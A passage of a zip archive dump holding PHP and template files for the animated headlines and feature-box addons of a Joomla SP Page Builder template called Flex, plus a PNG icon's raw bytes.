							<# } #>
						}
					<# } #>
				}
		<# } #>

		#sppb-addon-{{ data.id }} .sppb-addon-text {
			<# if(_.isObject(data.text_fontsize)){ #>
				font-size: {{ data.text_fontsize.md }}px;
			<# } else { #>
				font-size: {{ data.text_fontsize }}px;
			<# } #>
			font-weight: {{data.text_fontweight}};
			<# if(_.isObject(data.text_lineheight)){ #>
				line-height: {{ data.text_lineheight.md }}px;
			<# } else { #>
				line-height: {{ data.text_lineheight }}px;
			<# } #>
		}
                
		#sppb-addon-{{ data.id }} .sppb-media-content {
			background-color: {{data.text_background}};
			<# if(_.isObject(data.text_padding)){ #>
				padding: {{ data.text_padding.md }};
			<# } else { #>
				padding: {{ data.text_padding }};
			<# } #>
		}

		#sppb-addon-{{ data.id }} .sppb-media-content .sppb-btn {
			<# if(_.isObject(data.button_margin)) { #>
				margin: {{data.button_margin.md}};
			<# } else { #>
				margin: {{data.button_margin}};
			<# } #>
		}

		#sppb-addon-{{ data.id }} #btn-{{ data.id }}.sppb-btn-{{ data.type }}{
			letter-spacing: {{ data.btn_letterspace }};

			<# if(_.isObject(button_font_style) && button_font_style.underline) { #>
				text-decoration: underline;
				<# modern_font_style = true #>
			<# } #>

			<# if(_.isObject(button_font_style) && button_font_style.italic) { #>
				font-style: italic;
				<# modern_font_style = true #>
			<# } #>

			<# if(_.isObject(button_font_style) && button_font_style.uppercase) { #>
				text-transform: uppercase;
				<# modern_font_style = true #>
			<# } #>

			<# if(_.isObject(button_font_style) && button_font_style.weight) { #>
				font-weight: {{ button_font_style.weight }};
				<# modern_font_style = true #>
			<# } #>

			<# if(!modern_font_style) { #>
				<# if(_.isArray(button_fontstyle)) { #>
					<# if(button_fontstyle.indexOf("underline") !== -1){ #>
						text-decoration: underline;
					<# } #>
					<# if(button_fontstyle.indexOf("uppercase") !== -1){ #>
						text-transform: uppercase;
					<# } #>
					<# if(button_fontstyle.indexOf("italic") !== -1){ #>
						font-style: italic;
					<# } #>
					<# if(button_fontstyle.indexOf("lighter") !== -1){ #>
						font-weight: lighter;
					<# } else if(button_fontstyle.indexOf("normal") !== -1){#>
						font-weight: normal;
					<# } else if(button_fontstyle.indexOf("bold") !== -1){#>
						font-weight: bold;
					<# } else if(button_fontstyle.indexOf("bolder") !== -1){#>
						font-weight: bolder;
					<# } #>
				<# } #>
			<# } #>
		}

		<# if(data.btn_type == "custom"){ #>
			#sppb-addon-{{ data.id }} #btn-{{ data.id }}.sppb-btn-custom{
				<# if(_.isObject(data.btn_fontsize)){ #>
					font-size: {{data.btn_fontsize.md}}px;
				<# } else { #>
					font-size: {{data.btn_fontsize}}px;
				<# } #>
				color: {{ data.btn_color }};
				<# if(_.isObject(data.button_padding)) { #>
					padding: {{ data.button_padding.md }};
				<# } else { #>
					padding: {{ data.button_padding }};
				<# } #>
				<# if(data.btn_appearance == "outline"){ #>
					border-color: {{ data.btn_background_color }};
					background-color: transparent;
				<# } else if(data.btn_appearance == "3d"){ #>
					border-bottom-color: {{ data.btn_background_color_hover }};
					background-color: {{ data.btn_background_color }};
				<# } else if(data.btn_appearance == "gradient"){ #>
					border: none;
					<# if(typeof data.btn_background_gradient.type !== "undefined" && data.btn_background_gradient.type == "radial"){ #>
						background-image: radial-gradient(at {{ data.btn_background_gradient.radialPos || "center center"}}, {{ data.btn_background_gradient.color }} {{ data.btn_background_gradient.pos || 0 }}%, {{ data.btn_background_gradient.color2 }} {{ data.btn_background_gradient.pos2 || 100 }}%);
					<# } else { #>
						background-image: linear-gradient({{ data.btn_background_gradient.deg || 0}}deg, {{ data.btn_background_gradient.color }} {{ data.btn_background_gradient.pos || 0 }}%, {{ data.btn_background_gradient.color2 }} {{ data.btn_background_gradient.pos2 || 100 }}%);
					<# } #>
				<# } else { #>
					background-color: {{ data.btn_background_color }};
				<# } #>
			}

			#sppb-addon-{{ data.id }} #btn-{{ data.id }}.sppb-btn-custom:hover{
				color: {{ data.btn_color_hover }};
				background-color: {{ data.btn_background_color_hover }};
				<# if(data.btn_appearance == "outline"){ #>
					border-color: {{ data.btn_background_color_hover }};
				<# } else if(data.btn_appearance == "gradient"){ #>
					<# if(typeof data.btn_background_gradient_hover.type !== "undefined" && data.btn_background_gradient_hover.type == "radial"){ #>
						background-image: radial-gradient(at {{ data.btn_background_gradient_hover.radialPos || "center center"}}, {{ data.btn_background_gradient_hover.color }} {{ data.btn_background_gradient_hover.pos || 0 }}%, {{ data.btn_background_gradient_hover.color2 }} {{ data.btn_background_gradient_hover.pos2 || 100 }}%);
					<# } else { #>
						background-image: linear-gradient({{ data.btn_background_gradient_hover.deg || 0}}deg, {{ data.btn_background_gradient_hover.color }} {{ data.btn_background_gradient_hover.pos || 0 }}%, {{ data.btn_background_gradient_hover.color2 }} {{ data.btn_background_gradient_hover.pos2 || 100 }}%);
					<# } #>
				<# } #>
			}
			@media (min-width: 768px) and (max-width: 991px) {
				#sppb-addon-{{ data.id }} #btn-{{ data.id }}.sppb-btn-custom{
					<# if(_.isObject(data.btn_fontsize)){ #>
						font-size: {{data.btn_fontsize.sm}}px;
					<# } #>
					<# if(_.isObject(data.button_padding)) { #>
						padding: {{ data.button_padding.sm }};
					<# } #>
				}
			}
			@media (max-width: 767px) {
				#sppb-addon-{{ data.id }} #btn-{{ data.id }}.sppb-btn-custom{
					<# if(_.isObject(data.btn_fontsize)){ #>
						font-size: {{data.btn_fontsize.xs}}px;
					<# } #>
					<# if(_.isObject(data.button_padding)) { #>
						padding: {{ data.button_padding.xs }};
					<# } #>
				}
			}
		<# } #>

		@media (min-width: 768px) and (max-width: 991px) {
			#sppb-addon-{{ data.id }} .sppb-addon-text {
				<# if(_.isObject(data.text_fontsize)){ #>
					font-size: {{ data.text_fontsize.sm }}px;
				<# } #>

				<# if(_.isObject(data.text_lineheight)){ #>
					line-height: {{ data.text_lineheight.sm }}px;
				<# } #>
			}
			#sppb-addon-{{ data.id }} .sppb-media-content {
				<# if(_.isObject(data.text_padding)){ #>
					padding: {{ data.text_padding.sm }};
				<# } #>
			}
			<# if(_.isObject(data.button_margin)) { #>
				#sppb-addon-{{ data.id }} .sppb-media-content .sppb-btn {
					margin: {{data.button_margin.sm}};
				}
			<# } #>
		}

		@media (max-width: 767px) {
			#sppb-addon-{{ data.id }} .sppb-addon-text {
				<# if(_.isObject(data.text_fontsize)){ #>
					font-size: {{ data.text_fontsize.xs }}px;
				<# } #>

				<# if(_.isObject(data.text_lineheight)){ #>
					line-height: {{ data.text_lineheight.xs }}px;
				<# } #>
			}
			#sppb-addon-{{ data.id }} .sppb-media-content {
				<# if(_.isObject(data.text_padding)){ #>
					padding: {{ data.text_padding.xs }};
				<# } #>
			}
			<# if(_.isObject(data.button_margin)) { #>
				#sppb-addon-{{ data.id }} .sppb-media-content .sppb-btn {
					margin: {{data.button_margin.xs}};
				}
			<# } #>
		}
		<# if(data.addon_hover_bg || data.addon_hover_boxshadow || data.addon_hover_color) { #>
			#sppb-addon-{{ data.id }} {
				transition:.3s;
			}
			#sppb-addon-{{ data.id }}:hover{
				background:{{data.addon_hover_bg}};
				<# if(_.isObject(data.addon_hover_boxshadow)){
					let ho = data.addon_hover_boxshadow.ho || 0,
						vo = data.addon_hover_boxshadow.vo || 0,
						blur = data.addon_hover_boxshadow.blur || 0,
						spread = data.addon_hover_boxshadow.spread || 0,
						color = data.addon_hover_boxshadow.color || 0;
				#>
					box-shadow: {{ho}}px {{vo}}px {{blur}}px {{spread}}px {{color}};
				<# } else { #>
					box-shadow: {{data.addon_hover_boxshadow}};
				<# } #>
				color: {{data.addon_hover_color}};
			}
		<# }
		if(data.title_hover_color) { #>
			#sppb-addon-{{ data.id }} .sppb-feature-box-title{
				transition:.3s;
			}
			#sppb-addon-{{ data.id }}:hover .sppb-feature-box-title{
				color:{{data.title_hover_color}};
			}
		<# }
		if(data.icon_hover_bg || data.icon_hover_color) { #>
			#sppb-addon-{{ data.id }} .sppb-icon .sppb-icon-container{
				transition:.3s;
			}
			#sppb-addon-{{ data.id }}:hover .sppb-icon .sppb-icon-container{
				background:{{data.icon_hover_bg}};
				color:{{data.icon_hover_color}};
			}
		<# } #>

		</style>
		<div class="sppb-addon sppb-addon-feature {{ data.class }} {{ alignment }}">
			<div class="sppb-addon-content {{text_alignment}}">
				<# if (icon_image_position == "before") { #>
					<# if(media){ #>
						{{{ media }}}
					<# } #>
                    <div class="sppb-media-content">
                        <# if(data.title){ #>
                            {{{ feature_title }}}
                        <# } #>
						{{{ feature_text }}}
						<# if(data.btn_text && _.trim(data.btn_text)){
							let icon_arr = (typeof data.btn_icon !== "undefined" && data.btn_icon) ? data.btn_icon.split(" ") : "";
							let icon_name = icon_arr.length === 1 ? "fa "+data.btn_icon : data.btn_icon;
						#>
							<a href=\'{{ data.url }}\' id="btn-{{ data.id }}" target="{{ data.target }}" class="sppb-btn {{ classList }}"><# if(data.btn_icon_position == "left" && !_.isEmpty(data.btn_icon)) { #><i class="{{ icon_name }}"></i> <# } #>{{ data.btn_text }}<# if(data.btn_icon_position == "right" && !_.isEmpty(data.btn_icon)) { #> <i class="{{ icon_name }}"></i><# } #></a>
						<# } #>
                    </div>
				<# } else if (icon_image_position == "after") { #>
					<# if(data.title){ #>
						{{{ feature_title }}}
					<# } #>
					<# if(media){ #>
						{{{ media }}}
					<# } #>
                    <div class="sppb-media-content">
					{{{ feature_text }}}
					<# if(data.btn_text && _.trim(data.btn_text)){
						let icon_arr = (typeof data.btn_icon !== "undefined" && data.btn_icon) ? data.btn_icon.split(" ") : "";
						let icon_name = icon_arr.length === 1 ? "fa "+data.btn_icon : data.btn_icon;
					#>
						<a href=\'{{ data.url }}\' id="btn-{{ data.id }}" target="{{ data.target }}" class="sppb-btn {{ classList }}"><# if(data.btn_icon_position == "left" && !_.isEmpty(data.btn_icon)) { #><i class="{{ icon_name }}"></i> <# } #>{{ data.btn_text }}<# if(data.btn_icon_position == "right" && !_.isEmpty(data.btn_icon)) { #> <i class="{{ icon_name }}"></i><# } #></a>
					<# } #>
                    </div>
				<# } else { #>
					<# if(media) { #>
						<div class="sppb-media">
							<div class="pull-{{ icon_image_position }}">{{{ media }}}</div>
							<div class="sppb-media-body">
                                <div class="sppb-media-content">
                                    {{{image_icon}}}
                                    <# if(data.title){ #>
                                        {{{ feature_title }}}
                                    <# } #>
									{{{ feature_text }}}
									<# if(data.btn_text && _.trim(data.btn_text)){
										let icon_arr = (typeof data.btn_icon !== "undefined" && data.btn_icon) ? data.btn_icon.split(" ") : "";
										let icon_name = icon_arr.length === 1 ? "fa "+data.btn_icon : data.btn_icon;
									#>
										<a href=\'{{ data.url }}\' id="btn-{{ data.id }}" target="{{ data.target }}" class="sppb-btn {{ classList }}"><# if(data.btn_icon_position == "left" && !_.isEmpty(data.btn_icon)) { #><i class="{{ icon_name }}"></i> <# } #>{{ data.btn_text }}<# if(data.btn_icon_position == "right" && !_.isEmpty(data.btn_icon)) { #> <i class="{{ icon_name }}"></i><# } #></a>
									<# } #>
                                </div>
							</div>
						</div>
					<# } else { #>
						<div class="sppb-media">
							<div class="sppb-media-body">
                                <div class="sppb-media-content">
                                    {{{image_icon}}}
                                    <# if(data.title){ #>
                                        {{{ feature_title }}}
                                    <# } #>
									{{{ feature_text }}}
									<# if(data.btn_text && _.trim(data.btn_text)){
										let icon_arr = (typeof data.btn_icon !== "undefined" && data.btn_icon) ? data.btn_icon.split(" ") : "";
										let icon_name = icon_arr.length === 1 ? "fa "+data.btn_icon : data.btn_icon;
									#>
										<a href=\'{{ data.url }}\' id="btn-{{ data.id }}" target="{{ data.target }}" class="sppb-btn {{ classList }}"><# if(data.btn_icon_position == "left" && !_.isEmpty(data.btn_icon)) { #><i class="{{ icon_name }}"></i> <# } #>{{ data.btn_text }}<# if(data.btn_icon_position == "right" && !_.isEmpty(data.btn_icon)) { #> <i class="{{ icon_name }}"></i><# } #></a>
									<# } #>
                                </div>
							</div>
						</div>
					<# } #>
				<# } #>
			</div>
		</div>
		';
		return $output;
	}

}PK!�Z�DD5flex/sppagebuilder/addons/animated_headlines/site.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2018 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined ('_JEXEC') or die ('restricted access');

class SppagebuilderAddonAnimated_headlines extends SppagebuilderAddons {

	public function render() {

		$class = (isset($this->addon->settings->class) && $this->addon->settings->class) ? $this->addon->settings->class : '';
		$before_text = (isset($this->addon->settings->before_text) && $this->addon->settings->before_text) ? $this->addon->settings->before_text : '';
		$after_text = (isset($this->addon->settings->after_text) && $this->addon->settings->after_text) ? $this->addon->settings->after_text : '';
		$alignment = (isset($this->addon->settings->alignment) && $this->addon->settings->alignment) ? $this->addon->settings->alignment : '';
		$effect = (isset($this->addon->settings->effect) && $this->addon->settings->effect) ? $this->addon->settings->effect : 'slide reset-width';
		$heading_selector = (isset($this->addon->settings->heading_selector) && $this->addon->settings->heading_selector) ? $this->addon->settings->heading_selector : 'h2';
		$title_margin = (isset($this->addon->settings->title_margin) && $this->addon->settings->title_margin) ? $this->addon->settings->title_margin : '';
		$title_padding = (isset($this->addon->settings->title_padding) && $this->addon->settings->title_padding) ? $this->addon->settings->title_padding : '';
		
		$class = '';
		$output = '';
		$centered = '';
		$title_style = '';
		
		if($before_text && $after_text) {
			$centered = ' centered';
		}

		$output  = '<div class="sppb-addon-animated_headlines ' . $alignment . ' ' . $class . '">';
		
		// Before Text
		$output .= '<'.$heading_selector.' class="sppb-addon-title animated_headlines '. $effect .'">';
		if($before_text) {
			$output .= '<span class="before-text match-height">';
			$output .= nl2br($before_text);
			$output .= '</span>';
		}
		$output .= '<span class="ah-words-wrapper'. (($effect == 'letters type') ? ' waiting' : '' ) .' match-height">';
	
		// Repeatable Items
		foreach ($this->addon->settings->sp_animated_headlines_item as $key => $value) {
			
			$headline_class = (isset($value->headline_class) && $value->headline_class) ? $value->headline_class : '';
			
			if($value->title) {
				$text = (isset($value->title) && $value->title) ? $value->title: '';
				$output .= '<b id="headline-'. ($this->addon->id + $key) .'"'. (($key == 0) ? ' class="is-visible match-height animated_headline'. $headline_class. '"': ' class="'. $headline_class .' match-height animated_headline'. $centered .'"' ) .'>';
				if ($effect == 'letters rotate-2' || $effect == 'letters rotate-3' || $effect == 'letters scale') {
					$text = str_replace(" ", "&nbsp;", $text); // add &nbsp; between words for "letters only" words
				}
				$output .= nl2br($text);
				$output .= '</b>';
			}
		}
		$output .= '</span>';
		// After Text
		if($after_text) {
			$output .= '<span class="after-text match-height">';
			$output .= nl2br($after_text);
			$output .= '</span>';
		}
		
		$output  .= '</'.$heading_selector.'>';
		$output  .= '</div>';

		return $output;
	}
	
	public function css() {
        $addon_id = '#sppb-addon-' . $this->addon->id;
		$layout_path = JPATH_ROOT . '/components/com_sppagebuilder/layouts';

        $style = '';
        $style_sm = '';
        $style_xs = '';
		$line_height = '';
		$line_height_sm = '';
		$line_height_xs = '';
		
        $style .= (isset($this->addon->settings->title_margin) && $this->addon->settings->title_margin) ? 'margin: ' . $this->addon->settings->title_margin  . '; ' : '0';
        $style_sm .= (isset($this->addon->settings->title_margin_sm) && $this->addon->settings->title_margin_sm) ? 'margin: ' . $this->addon->settings->title_margin_sm  . '; ' : '0';
        $style_xs .= (isset($this->addon->settings->title_margin_xs) && $this->addon->settings->title_margin_xs) ? 'margin: ' . $this->addon->settings->title_margin_xs  . '; ' : '0';

        $style .= (isset($this->addon->settings->title_padding) && $this->addon->settings->title_padding) ? 'padding: ' . $this->addon->settings->title_padding  . '; ' : '0';
        $style_sm .= (isset($this->addon->settings->title_padding_sm) && $this->addon->settings->title_padding_sm) ? 'padding: ' . $this->addon->settings->title_padding_sm  . '; ' : '0';
        $style_xs .= (isset($this->addon->settings->title_padding_xs) && $this->addon->settings->title_padding_xs) ? 'padding: ' . $this->addon->settings->title_padding_xs  . '; ' : '0';

        $heading_selector = (isset($this->addon->settings->heading_selector) && $this->addon->settings->heading_selector) ? $this->addon->settings->heading_selector : 'h2';
		
		// Headlines
		$style .= (isset($this->addon->settings->title_fontsize) && $this->addon->settings->title_fontsize) ? 'font-size: ' . $this->addon->settings->title_fontsize . 'px;' : '';
		$style_sm .= (isset($this->addon->settings->title_fontsize_sm) && $this->addon->settings->title_fontsize_sm) ? 'font-size: ' . $this->addon->settings->title_fontsize_sm . 'px;' : '';
        $style_xs .= (isset($this->addon->settings->title_fontsize_xs) && $this->addon->settings->title_fontsize_xs) ? 'font-size: ' . $this->addon->settings->title_fontsize_xs . 'px;' : '';
		$style .= (isset($this->addon->settings->title_lineheight) && $this->addon->settings->title_lineheight) ? 'line-height: ' . $this->addon->settings->title_lineheight . 'px;' : '';
		$style_sm .= (isset($this->addon->settings->title_lineheight_sm) && $this->addon->settings->title_lineheight_sm) ? 'line-height: ' . $this->addon->settings->title_lineheight_sm . 'px;' : '';
        $style_xs .= (isset($this->addon->settings->title_lineheight_xs) && $this->addon->settings->title_lineheight_xs) ? 'line-height: ' . $this->addon->settings->title_lineheight_xs . 'px;' : '';
		$style .= (isset($this->addon->settings->title_letterspace) && $this->addon->settings->title_letterspace) ? 'letter-spacing: ' . $this->addon->settings->title_letterspace . ';' : '';
		
        if(isset($this->addon->settings->title_text_shadow) && is_object($this->addon->settings->title_text_shadow)){
            $ho = (isset($this->addon->settings->title_text_shadow->ho) && $this->addon->settings->title_text_shadow->ho != '') ? $this->addon->settings->title_text_shadow->ho.'px' : '0';
            $vo = (isset($this->addon->settings->title_text_shadow->vo) && $this->addon->settings->title_text_shadow->vo != '') ? $this->addon->settings->title_text_shadow->vo.'px' : '0';
            $blur = (isset($this->addon->settings->title_text_shadow->blur) && $this->addon->settings->title_text_shadow->blur != '') ? $this->addon->settings->title_text_shadow->blur.'px' : '0';
            $color = (isset($this->addon->settings->title_text_shadow->color) && $this->addon->settings->title_text_shadow->color != '') ? $this->addon->settings->title_text_shadow->color : '#777';

            $style .= "text-shadow: ${ho} ${vo} ${blur} ${color};";
        }

        $style .= (isset($this->addon->settings->title_text_transform) && $this->addon->settings->title_text_transform) ? 'text-transform: ' . $this->addon->settings->title_text_transform  . '; ' : '';
		
		// Loading Bar
		$loading_bar = (isset($this->addon->settings->loading_bar) && $this->addon->settings->loading_bar) ? 'height: ' . $this->addon->settings->loading_bar  . 'px;' : '';
		$loading_bar_color = (isset($this->addon->settings->loading_bar_color) && $this->addon->settings->loading_bar_color != '') ? 'background-color:' .$this->addon->settings->loading_bar_color  . ';' : '';
		
		$typing_cursor_color = (isset($this->addon->settings->typing_cursor_color) && $this->addon->settings->typing_cursor_color != '') ? 'border-right:3px solid ' .$this->addon->settings->typing_cursor_color  . ';' : '';
		
		$clip_cursor_color = (isset($this->addon->settings->clip_cursor_color) && $this->addon->settings->clip_cursor_color != '') ? 'background-color:' .$this->addon->settings->clip_cursor_color  . ';' : '';
		
		// Line Height
		$line_height .= (isset($this->addon->settings->title_lineheight) && $this->addon->settings->title_lineheight) ? 'line-height: ' . $this->addon->settings->title_lineheight . 'px;' : '';
		$line_height_sm .= (isset($this->addon->settings->title_lineheight_sm) && $this->addon->settings->title_lineheight_sm) ? 'line-height: ' . $this->addon->settings->title_lineheight_sm . 'px;' : '';
        $line_height_xs .= (isset($this->addon->settings->title_lineheight_xs) && $this->addon->settings->title_lineheight_xs) ? 'line-height: ' . $this->addon->settings->title_lineheight_xs . 'px;' : '';


        $css = '';
        if ($style) {
            $css .= $addon_id . ' ' . $heading_selector . '.sppb-addon-title {' . $style . '}';
        }

        if ($style_sm) {
            $css .= '@media (min-width: 768px) and (max-width: 991px) {';
            $css .= $addon_id . ' ' . $heading_selector . '.sppb-addon-title {' . $style_sm . '}';
			$css .= $addon_id . ' ' . $heading_selector . '.sppb-addon-title span, ' . $addon_id . ' ' . $heading_selector . '.sppb-addon-title span b {' . $line_height_sm . '}';
            $css .= '}';
        }

        if ($style_xs) {
            $css .= '@media (max-width: 767px) {';
            $css .= $addon_id . ' ' . $heading_selector . '.sppb-addon-title {' . $style_xs . '}';
			$css .= $addon_id . ' ' . $heading_selector . '.sppb-addon-title span, ' . $addon_id . ' ' . $heading_selector . '.sppb-addon-title span b {' . $line_height_xs . '}';
            $css .= '}';
        }
		
		if ($typing_cursor_color) {
			$css .= $addon_id . ' ' . $heading_selector . '.type .ah-words-wrapper::after {' . $typing_cursor_color .'}';
		}
		
		if ($clip_cursor_color) {
			$css .= $addon_id . ' ' . $heading_selector . '.clip .ah-words-wrapper::after {' . $clip_cursor_color .'}';
		}
		
		
		if ($loading_bar || $loading_bar_color) {
			$css .= $addon_id . ' ' . $heading_selector . '.loading-bar .ah-words-wrapper::after {' . $loading_bar . $loading_bar_color .'}';
		}
		
	
		// Repeatable Items
		$headline_style = '';
		$headline_fontstyle = '';	
		
		if(isset($this->addon->settings->sp_animated_headlines_item) && count($this->addon->settings->sp_animated_headlines_item)){
			foreach ($this->addon->settings->sp_animated_headlines_item as $key => $value) {
				$headline_color = (isset($value->headline_color) && $value->headline_color != '') ? $value->headline_color : '';
				$headline_fontstyle = (isset($value->headline_fontstyle) && $value->headline_fontstyle != '') ? $value->headline_fontstyle : '';

				
				if($value->title) {
					
					if(is_array($headline_fontstyle) && count($headline_fontstyle)) {
						if(in_array('uppercase', $headline_fontstyle)) {
						  $headline_style .= 'text-transform: uppercase;';
						} 
				
						if(in_array('italic', $headline_fontstyle)) {
						  $headline_style .= 'font-style: italic;';
						} 
				
						if(in_array('lighter', $headline_fontstyle)) {
						  $headline_style = 'font-weight: lighter;';
						} else if(in_array('normal', $headline_fontstyle)) {
						  $headline_style .= 'font-weight: normal;';
						} else if(in_array('bold', $headline_fontstyle)) {
						  $headline_style .= 'font-weight: bold;';
						} else if(in_array('bolder', $headline_fontstyle)) {
						  $headline_style .= 'font-weight: bolder;';
						} 
					}
		
					$options = new stdClass;
					
					$options->headline_font_family = (isset($value->headline_font_family) && $value->headline_font_family) ? $value->headline_font_family : '';
					$options->headline_font_family_selector = (isset($value->font_family_selector) && $value->font_family_selector) ? $value->font_family_selector : '';
				
					$selector_css = new JLayoutFile('addon.css.selector', $layout_path);
					$css .= $selector_css->render(
					  array(
					    'options'=>$value,
					    'addon_id'=>$addon_id,
					    'selector'=>'#headline-' . ($this->addon->id + $key)
					  )
					);
					

					if($headline_color || $headline_fontstyle) {
						$css .= $addon_id . ' ' . $heading_selector . '.sppb-addon-title #headline-'. ($this->addon->id + $key) .', ' .$addon_id . ' ' . $heading_selector . '.sppb-addon-title #headline-' . ($this->addon->id + $key) . ' i, ' .$addon_id . ' ' . $heading_selector . '.sppb-addon-title #headline-' . ($this->addon->id + $key) . ' span, ' .$addon_id . ' ' . $heading_selector . '.sppb-addon-title #headline-' . ($this->addon->id + $key) . ' b {'. $headline_style .'color: ' . $headline_color . '}';
					}
				}
			}
		}
        return $css;
    }
	
	    public static function getTemplate() {
        $output = '
        <#
            var margin = "";
			var margin_sm = "";
			var margin_xs = "";
			if(data.title_margin){
				if(_.isObject(data.title_margin)){
                    if(data.title_margin.md.trim() != ""){
                        margin = data.title_margin.md.split(" ").map(item => {
                            if(_.isEmpty(item)){
                                return "0";
                            }
                            return item;
                        }).join(" ")
                    }
                    if(data.title_margin.sm.trim() != ""){
                        margin_sm = data.title_margin.sm.split(" ").map(item => {
                            if(_.isEmpty(item)){
                                return "0";
                            }
                            return item;
                        }).join(" ")
                    }
                    if(data.title_margin.xs.trim() != ""){
                        margin_xs = data.title_margin.xs.split(" ").map(item => {
                            if(_.isEmpty(item)){
                                return "0";
                            }
                            return item;
                        }).join(" ")
                    }
				} else {
                    if(data.title_margin.trim() != ""){
                        margin = data.title_margin.split(" ").map(item => {
                            if(_.isEmpty(item)){
                                return "0";
                            }
                            return item;
                        }).join(" ")
                    }
				}

			}

			var padding = "";
			var padding_sm = "";
			var padding_xs = "";
			if(data.title_padding){
				if(_.isObject(data.title_padding)){
					if(data.title_padding.md.trim() !== ""){
						padding = data.title_padding.md.split(" ").map(item => {
							if(_.isEmpty(item)){
								return "0";
							}
							return item;
						}).join(" ")
					}

					if(data.title_padding.sm.trim() !== ""){
						padding_sm = data.title_padding.sm.split(" ").map(item => {
							if(_.isEmpty(item)){
								return "0";
							}
							return item;
						}).join(" ")
					}

					if(data.title_padding.xs.trim() !== ""){
						padding_xs = data.title_padding.xs.split(" ").map(item => {
							if(_.isEmpty(item)){
								return "0";
							}
							return item;
						}).join(" ")
					}
				} else {
					padding = data.title_padding.split(" ").map(item => {
						if(_.isEmpty(item)){
							return "0";
						}
						return item;
					}).join(" ")
				}

            }
   
            var titleTextShadow = "";
			if(_.isObject(data.title_text_shadow)){
				let ho = data.title_text_shadow.ho || 0,
					vo = data.title_text_shadow.vo || 0,
					blur = data.title_text_shadow.blur || 0,
					color = data.title_text_shadow.color || 0;

                titleTextShadow = ho+\'px \'+vo+\'px \'+blur+\'px \'+color;
			}
        #>
        <style type="text/css">
            #sppb-addon-{{ data.id }} {{ data.heading_selector }}.sppb-addon-title{
                margin: {{ margin }};
                padding: {{ padding }};
                text-shadow: {{ titleTextShadow }};
                text-transform: {{ data.title_text_transform }};
            }

            @media (min-width: 768px) and (max-width: 991px) {
                #sppb-addon-{{ data.id }} {{ data.heading_selector }}.sppb-addon-title{
                    margin: {{ margin_sm }};
                    padding: {{ padding_sm }};
                }
            }
            @media (max-width: 767px) {
                #sppb-addon-{{ data.id }} {{ data.heading_selector }}.sppb-addon-title{
                    margin: {{ margin_xs }};
                    padding: {{ padding_xs }};
                }
            }
        </style>
		<div class="sppb-addon-animated_headlines {{ data.class }} {{ data.alignment }}">
			<{{ data.heading_selector }} class="sppb-addon-title animated_headlines {{ data.effect }}">
			<span class="before-text match-height">{{{ data.before_text }}}</span>
			<span class="ah-words-wrapper match-height">
			<# _.each(data.sp_animated_headlines_item, function(animated_headlines_item, key){
				var activeClass = (key == 0) ? "is-visible " : ""; 
				#>
				<# if(animated_headlines_item.title){ #>
					<b class="{{ activeClass }} match-height animated_headline">
					{{ animated_headlines_item.title }}
					</b>
				<# } #>
			<# }); #>
			</span>
			<span class="after-text match-height">{{{ data.after_text }}}</span>
			</{{ data.heading_selector }}>
        </div>
        ';

        return $output;
    }

}PK!rh�eeCflex/sppagebuilder/addons/animated_headlines/assets/images/icon.pngnu&1i��PNG


IHDR@@�iq�tEXtSoftwareAdobe ImageReadyq�e<siTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c021 79.154911, 2013/10/29-11:47:16        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:a7cf9b43-0fb3-4fab-a54f-a0dd7b941ab3" xmpMM:DocumentID="xmp.did:AE677A9FED5911E7940FA1AAC04EEF86" xmpMM:InstanceID="xmp.iid:AE677A9EED5911E7940FA1AAC04EEF86" xmp:CreatorTool="Adobe Photoshop CC (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:b703b0cf-5af8-4130-8151-d0afe5988b84" stRef:documentID="xmp.did:a7cf9b43-0fb3-4fab-a54f-a0dd7b941ab3"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�*��IDATx��[�OA�m�\�U��HH�FII#i�K�;	-��g�� �x��Q��Pc�4x���'�&1q�^wZlӅ�e�?�{��n33;��|o��&�rG�bS�=�\ƁQo;��{�-�կ��8����w��J��5Nx�6f��g7�m`�iO2�ˎ��j��n�<���>^W��'
8���!��;!��-�yZh�K�!�f�iO�i/��p1�,�ܧ���gt�MS�S�~F��5��j�9����e��$ ��.�g�(����:�y�D���7��߶m<I��1V@��>N�0�H۾�= ���X�!��@"���	�Y�jU�X+@�E	K�\׽�D�u?"��p39Ca�9�=#y%Ɯ��S6�a=W�T��l6�\���O�A9E�����~#���9���7�I���V'�\����M0.
(�ˑ8�*�JZ��d�D��
�͘�19�'c����$Sl�6+`�*�3��ex"P9�,���1\}��^��ʫ��bG�s'����k���1m��f�o��&6�L����7~,�R*��Nv,���{;~Q^��U�U�'=$��Ӵ���F�P(�6����0s���%x�f����O��;dX=�$IEND�B`�PK!��	Y Y 6flex/sppagebuilder/addons/animated_headlines/admin.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2018 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined ('_JEXEC') or die ('restricted access');

SpAddonsConfig::addonConfig(
	array(
		'type'=>'repeatable',
		'addon_name'=>'sp_animated_headlines',
		'title'=>JText::_('FLEX_ADDON_ANIMATED_HEADLINES'),
		'desc'=>JText::_('FLEX_ADDON_ANIMATED_HEADLINES_DESC'),
		'category'=>'Flex',
		'attr'=>array(
			'general' => array(

				'admin_label'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL_DESC'),
					'std'=> ''
				),
				'separator1'=>array(
					'type'=>'separator', 
					'title'=>JText::_('Animation Effects')
				),
				'effect'=>array(
					'type'=>'select',
					'title'=>JText::_('Effect'),
